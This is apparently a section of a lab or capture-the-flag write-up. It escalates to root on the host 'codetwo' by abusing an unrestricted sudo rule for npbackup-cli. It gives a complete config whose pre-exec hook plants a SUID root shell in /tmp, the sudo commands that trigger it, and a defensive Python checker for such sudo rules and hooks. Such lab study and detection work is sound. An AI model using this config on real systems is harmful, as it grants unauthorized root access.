2.npbackup-cli

marco@codetwo:~#$ sudo -l
Matching Defaults entries for marco on codetwo:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User marco may run the following commands on codetwo:
    `(ALL : ALL) NOPASSWD: /usr/local/bin/npbackup-cli`

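npbackup-cli is a restic-based backup tool. Its configuration file can define pre-exec and post-exec hooks, which run external commands before and after a backup operation. It also supports the stdin_from_command parameter, which takes the output of an external command as the input to back up. Because the sudo rule above places no restriction on arguments, a configuration file passed with --config is loaded by a process running as root, and its hooks run with that privilege.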

First, using the configuration in the home directory as a reference, create an npbackup configuration file named npbackup-config.yaml:

conf_version: 3.0.1
repos:
  default:
    repo_uri: file:///tmp/backup-repo
    repo_group: exploit_group
    backup_opts:
      paths:
        - /tmp
      source_type: folder_list
      exclude_files_larger_than: 0.0
    repo_opts:
      repo_password: yourpassword
      retention_policy: {}
      prune_max_unused: 0
    prometheus: {}
    env: {}
    is_protected: false
groups:
  exploit_group:
    backup_opts:
      paths: []
      source_type: folder_list
      stdin_from_command: []
      stdin_filename: 
      tags: []
      compression: auto
      use_fs_snapshot: false  # disabled for simplicity (no VSS needed)
      ignore_cloud_files: true
      one_file_system: false
      priority: low
      exclude_caches: true
      excludes_case_ignore: false
      exclude_files: []
      exclude_patterns: []
      exclude_files_larger_than: 0
      additional_parameters: []
      additional_backup_only_parameters: []
      minimum_backup_size_error: 10 MiB
      pre_exec_commands:
        - /bin/sh -c "cp /bin/sh /tmp/rootsh && chown root:root /tmp/rootsh && chmod 4777 /tmp/rootsh"
      pre_exec_per_command_timeout: 3600
      pre_exec_failure_is_fatal: false
      post_exec_commands: []
      post_exec_per_command_timeout: 3600
      post_exec_failure_is_fatal: false
      post_exec_execute_even_on_backup_error: true
      post_backup_housekeeping_percent_chance: 0
      post_backup_housekeeping_interval: 0
    repo_opts:
      repo_password: 
      repo_password_command: 
      minimum_backup_age: 1440
      upload_speed: 0
      download_speed: 0
      backend_connections: 0
      retention_policy: {}
      prune_max_unused: 0 B
      prune_max_repack_size: 
    prometheus:
      backup_job: exploit_job
      group: exploit_group
    env:
      env_variables: {}
      encrypted_env_variables: {}
    is_protected: false
identity:
  machine_id: exploit_id
  machine_group: 
global_prometheus:
  metrics: false
  instance: exploit_instance
  destination: 
  http_username: 
  http_password: 
  additional_labels: {}
  no_cert_verify: false
global_options:
  auto_upgrade: false
  auto_upgrade_percent_chance: 5
  auto_upgrade_interval: 15
  auto_upgrade_server_url: 
  auto_upgrade_server_username: 
  auto_upgrade_server_password: 
  auto_upgrade_host_identity: exploit_id
  auto_upgrade_group: 

Initialize the repository (optional):

sudo -u root /usr/local/bin/npbackup-cli --init --config /tmp/npbackup-config.yaml --repo-name default

Run the backup operation as root, which triggers the hook:

sudo -u root /usr/local/bin/npbackup-cli -b --config /tmp/npbackup-config.yaml --repo-name default
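
Seen from the defender's side, the two conditions this section relies on can be checked mechanically: a NOPASSWD sudo entry with no argument list, and a config whose command-execution keys are non-empty. The following is an added example, not part of the original write-up or of npbackup; the function names and sample strings are constructed for illustration, and the YAML scan is a line-based approximation rather than a full parser.

```python
import re

# Keys from the config above whose values npbackup executes as commands.
EXEC_KEYS = ("pre_exec_commands", "post_exec_commands", "stdin_from_command")

def unrestricted_nopasswd(sudo_l_output):
    """List (runas, command) NOPASSWD entries that have no argument list.

    sudoers allows any arguments for such an entry, so the invoking user
    picks flags like --config and with them the file the tool loads.
    """
    hits = []
    for line in sudo_l_output.splitlines():
        entry = re.match(r"\s*\(([^)]*)\)\s*(.+)", line)
        if not entry:
            continue
        nopasswd = False  # a tag applies to the following commands too
        for spec in entry.group(2).split(", "):
            tags, cmd = re.match(r"((?:[A-Z_]+:\s*)*)(.*)", spec.strip()).groups()
            if "NOPASSWD:" in tags:
                nopasswd = True
            elif "PASSWD:" in tags:
                nopasswd = False
            if nopasswd and cmd.startswith("/") and len(cmd.split()) == 1:
                hits.append((entry.group(1).strip(), cmd))
    return hits

def exec_hooks(config_text):
    """Map each non-empty command-execution key to the commands it holds."""
    found, current = {}, None
    for line in config_text.splitlines():
        key = re.match(r"\s*([A-Za-z_]+):\s*(.*)$", line)
        item = re.match(r"\s*-\s+(.+)$", line)
        if key:
            name, value = key.group(1), key.group(2).strip()
            current = name if name in EXEC_KEYS else None
            if current and value not in ("", "[]", "null", "~"):
                found.setdefault(current, []).append(value)
        elif item and current:
            found.setdefault(current, []).append(item.group(1).strip())
    return found

# Constructed samples: the sudo -l entry shown above, and a config with a harmless hook.
SUDO_L = "User marco may run the following commands on codetwo:\n    (ALL : ALL) NOPASSWD: /usr/local/bin/npbackup-cli\n"
CONFIG = "groups:\n  g:\n    backup_opts:\n      stdin_from_command: []\n      pre_exec_commands:\n        - /bin/echo constructed-hook\n      post_exec_commands: []\n"

if __name__ == "__main__":
    print(unrestricted_nopasswd(SUDO_L))
    print(exec_hooks(CONFIG))
```

A sudoers entry that spells out its arguments is not reported, because sudo then only permits that exact invocation.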
